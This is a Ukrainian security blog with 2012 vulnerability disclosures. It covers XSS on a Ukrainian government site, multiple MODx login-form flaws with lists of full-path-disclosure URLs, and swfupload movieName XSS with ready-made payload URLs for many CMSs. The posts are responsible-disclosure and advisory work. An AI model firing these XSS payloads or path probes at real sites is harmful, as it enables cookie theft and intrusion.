Websecurity - Веб безпека

11.07.2012

У липні, 04.07.2012, я знайшов Cross-Site Scripting уразливості на http://www.kmu.gov.ua - сайті Кабінету Міністрів України. Одну уразливість виявив AmplenuS, про що повідомив мені, а коли я її перевірив, то я знайшов іще одну. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже неодноразово писав про дірки на сайті Кабміну. В останнє - коли писав про уразливості на kvs.gov.ua, dcz.gov.ua та kmu.gov.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.11.2012

XSS:

• alert(document.cookie)
• alert(document.cookie)

Дані уразливості вже виправлені. Але як і в попередні роки (починаючи з 2006 року), коли я повідомляв Кабміну про уразливості на їхньому сайті, подякувати вони не спромоглися.

При цьому на сайті все ще є інші уразливості. Тобто що в 2006, що в 2012 році, Кабмін та інші міністерства ведуть себе невдячно і продовжують не слідкувати за безпекою власних сайтів.

28.06.2012

У травні, 18.05.2012, під час пентесту, я виявив багато уразливостей в системі MODx, зокрема Cross-Site Request Forgery, Abuse of Functionality, Denial of Service та Insufficient Anti-automation. Це друга порція уразливостей в MODx. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

24.11.2012

Cross-Site Request Forgery (WASC-09):

Відсутність захисту від Brute Force (такого як капча) в формі логіна (http://site/manager/) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін в акаунт (щоб проводити атаки на уразливості всередині акаунта). Це також може бути використано для автоматизованого входу в акаунт, фішинга та інших автоматизованих атак. Нижченаведена DoS атака проводиться через дану CSRF уразливість.

Abuse of Functionality (Login Enumeration) (WASC-42):

В формі логіна (http://site/manager/) можливий підбір логінів. Якщо блокування не спрацьовує після трьох запитів (як може бути встановлене на сайті), значить немає такого логіна в системі, тобто воно спрацьовує лише для робочих логінів. Атака можлива, якщо включене блокування.

Експлоіт:

MODx Abuse of Functionality-1.html

Abuse of Functionality (WASC-42):

Після знаходження логіна з вищезгаданою уразливістю можливе зловживання блокуванням акаунтів. Після трьох запитів (як може бути встановлене на сайті) акаунт може бути заблокований (навіть акаунт адміна). Постійно посилаючи запити до цього функціоналу (по три некоректні запити), можна постійно тримати акаунт заблокованим (в тому числі адмінський).

Експлоіт:

MODx Abuse of Functionality-2.html

Denial of Service (WASC-10):

Посилаючи POST запит скрипту http://site/manager/processors/login.processor.php, він повертається на попередню сторінку, яка знову відсилає запит до цього скрипта. Таким чином створюється Looped DoS, що може створити навантаження на сервер.

Експлоіт:

MODx Looped DoS.html

Insufficient Anti-automation (WASC-21):

В формі логіна (http://site/manager/) немає захисту від автоматизований запитів, що дозволяє автоматизовано підбирати логіни (через Abuse of Functionality уразливість). Так само як автоматизовано підбирати паролі (через Brute Force уразливість) до підібраних логінів. А також проводити автоматизоване блокування виявлених акаунтів.

В формі відновлення паролю (http://site/manager/index.php ?action=show_form) немає захисту від автоматизований запитів, що дозволяє автоматизовано підбирати емайли користувачів.

Уразливі MODx 1.0.6 та попередні версії.

В даній добірці уразливості в веб додатках:

• Multiple integer overflows in libxml2 (деталі)
• PIAF H.M.S - SQL Injection (деталі)
• request-tracker3.8 security update (деталі)
• rtfm security update (деталі)
• HP iNode Management Center, Remote Execution of Arbitrary Code (деталі)
• Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 (деталі)
• SQL Injection Vulnerability in OrangeHRM (деталі)
• Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution Vulnerability (деталі)
• (0Day) HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability (деталі)
• PrestaShop <= 1.5.1 Persistent XSS (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах UK Cookie, Hitasoft FLV Player та Kakao Theme. Для котрих з’явилися експлоіти. UK Cookie - це плагін для сайтів в Великобританнії, де з 26.05.2012 почали діяти штрафи стосовно cookies, Hitasoft FLV Player - це FLV-плеєр, Kakao Theme - це тема движка.

• Reflective XSS in uk cookie plugin (деталі)
• WordPress Hitasoft FLV Player 1.1 SQL Injection (деталі)
• WordPress Kakao Theme SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я писав про XSS уразливість в TinyMCE, SPIP, Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередніх записах я писав про веб додатки з swfupload_f8.swf, swfupload_f9.swf і swfupload.swf (які призначені для Flash Player 8, 9 і 10), то зараз я напишу про веб додатки з swfupload_f10.swf та swfupload_f11.swf, які призначені для Flash Player 10 і 11. Зокрема я виявив дану Cross-Site Scripting уразливість в SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir - серед багатьох веб додатків, що постачаються з swfupload_f10.swf або swfupload_f11.swf.

XSS:

SwfUploadPanel для TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin для TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Archiv plugin для TinyMCE окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Liferay Portal окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Swfupload для Drupal:

Як можна побачити з проекту http://code.google.com/p/drupal-swfupload/ - існує версія Swfupload для Drupal. Але саме в цьому проекті немає файлів. Зате вони є в проекті Respectiva, що представляє собою Drupal з Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload для Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Це стосовно swfupload_f10.swf. А стосовно swfupload_f11.swf, то в індексі Гугла є лише один проект - SentinelleOnAir, що містить swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Уразливі потенційно всі версії SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Цього року я вже писав про численні уразливості в Akismet для WordPress. Він є core-плагіном (починаючи з версії WP 2.0), тому ці уразливості також стосуються самого WordPress. А в жовтні були виявлені та оприлюднені дві Cross-Site Scripting уразливості в Akismet. Які стосуються невідомої версії плагіна (потенційно останньої версії). Вони були знайдені Nafsh.

Раніше я вже писав про XSS уразливість в swfupload в WordPress.

XSS:

В плагіні в скрипті legacy.php через параметр s та в скрипті admin.php через параметр url можна проводити XSS атаки. При цьому обходячи існуючі захисні фільтри.

• WordPress Akismet Cross Site Scripting (http://packetstormsecurity.org/files/117063/WordPress-Akismet-Cross-Site-Scripting.html)

При цьому автор зазначає, що атака відбувається при відправленні POST запитів до legacy.php і admin.php. Але при зверненні до цих скриптів (будь то GET чи POST запит), виводиться повідомлення про помилку (з FPD, про які я писав раніше). І автор наводить експлоіт для XSS в legacy.php - ясна річ неробочий (з вищенаведеної причини). Тому дані уразливості викликають сумніви, як враховуючи те, що атакуючі запити потрібно посилати іншим скриптам, так і наявність фільтрації вказаних параметрів (явно фейкові дірки).

Уразливі WordPress 3.x та попередні версії, що постачаються з вразливими версіями Akismet.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах AJAX post Search, FoxyPress та Spider WordPress. Для котрих з’явилися експлоіти. AJAX post Search - це пошуковий плагін, FoxyPress - це e-commerce плагін для створення онлайн-магазина, Spider WordPress - це плагін для створення каталогу продуктів.

• Sql injection in AJAX post Search wordpress plugin (деталі)
• WordPress FoxyPress 0.4.2.5 XSS / CSRF / SQL Injection (деталі)
• WordPress Catalog HTML Injection / Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Cisco Application Control Engine Administrator IP Address Overlap Vulnerability (деталі)
• XSS Vulnerabilities in ClipBucket (деталі)
• VaM Shop Cross-Site Scripting and Blind SQL Injection Vulnerabilities (деталі)
• Smf 2.0.2 Cross-Site Scripting Vulnerability (деталі)
• McAfee SmartFilter Administration Server SFAdminSrv.exe JBoss RMI Remote Code Execution Vulnerabilty (деталі)
• Inventory 1.0 Multiple SQL Vulnerabilities (деталі)
• Inventory 1.0 Multiple XSS Vulnerabilities (деталі)
• viewvc security update (деталі)
• Vulnerability in apache-mod_auth_openid (деталі)
• Layton Helpbox 4.4.0 Multiple Security Issues (деталі)

Раніше я писав про XSS уразливість в AionWeb, ExpressionEngine, Liferay Portal, SurgeMail, symfony (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередніх записах я писав про веб додатки з swfupload.swf і swfupload_f9.swf (які призначені для Flash Player 10 та Flash Player 9), то зараз я напишу про веб додатки з swfupload_f8.swf, який призначений для Flash Player 8. Зокрема я виявив дану Cross-Site Scripting уразливість в Archiv plugin для TinyMCE, Squeeze Documents для SPIP, Upload Manager для Radiant CMS, AionWeb, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail та symfony - серед багатьох веб додатків, що постачаються з swfupload_f8.swf.

XSS:

Archiv plugin для TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Squeeze Documents для SPIP:

http://site/plugins_spip/squeeze_documents/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/plugins_spip/squeeze_documents/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Upload Manager для Radiant CMS:

http://site/public/swfupload/Flash8/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/public/swfupload/Flash9/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В AionWeb окрім swfupload.swf і swfupload_f9.swf, описаних раніше, також присутній і swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Liferay Portal окрім swfupload_f9.swf, описаному раніше, також присутній і swfupload_f8.swf.

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В SurgeMail окрім swfupload.swf і swfupload_f9.swf, описаних раніше, також присутній і swfupload_f8.swf.

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В symfony окрім swfupload_f9.swf, описаному раніше, також присутній і swfupload_f8.swf.

Уразливі потенційно всі версії Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

27.06.2012

У травні, 18.05.2012, під час пентесту, я виявив багато уразливостей в системі MODx, зокрема Brute Force та Full path disclosure. Це перша порція уразливостей в MODx. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в Tagcloud для MODx CMS та JWPlayer для MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

17.11.2012

Brute Force (WASC-11):

В формі логіна (http://site/manager/) немає надійного захисту від Brute Force атак.

При цьому зустрічаються сайти, де є такий захист як блокування після багатьох невдалих спроб логіну. Але цей захист неефективний - пароль може бути підібраний ще до спрацювання блокування (як це було під час мого пентесту), блокування працює короткий час і воно працює лише для конкретного акаунту, тобто можна підбирати паролі для інших незаблокованих акаунтів.

Full path disclosure (WASC-13):

http://site/assets/cache/siteCache.idx.php
http://site/assets/plugins/ckeditor/read_config.php
http://site/assets/plugins/managermanager/default.mm_rules.inc.php
http://site/assets/plugins/managermanager/example.mm_rules.inc.php
http://site/assets/plugins/managermanager/mm.inc.php
http://site/assets/plugins/phx/modifiers/parent.phx.php
http://site/assets/snippets/ditto/classes/debug.class.inc.php
http://site/assets/snippets/ditto/extenders/tagging.extender.inc.php
http://site/assets/snippets/ditto/formats/atom.format.inc.php
http://site/assets/snippets/ditto/formats/json.format.inc.php
http://site/assets/snippets/ditto/formats/rss.format.inc.php
http://site/assets/snippets/ditto/formats/xml.format.inc.php
http://site/manager/includes/browsercheck.inc.php
http://site/manager/includes/mutate_settings.ajax.php
http://site/manager/includes/rss.inc.php
http://site/manager/includes/extenders/getUserData.extender.php
http://site/manager/includes/sniff/phpSniff.class.php
http://site/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php

Деякі з FPD відносяться до движка, а деякі до плагінів для нього.

Уразливі MODx 1.0.6 та попередні версії.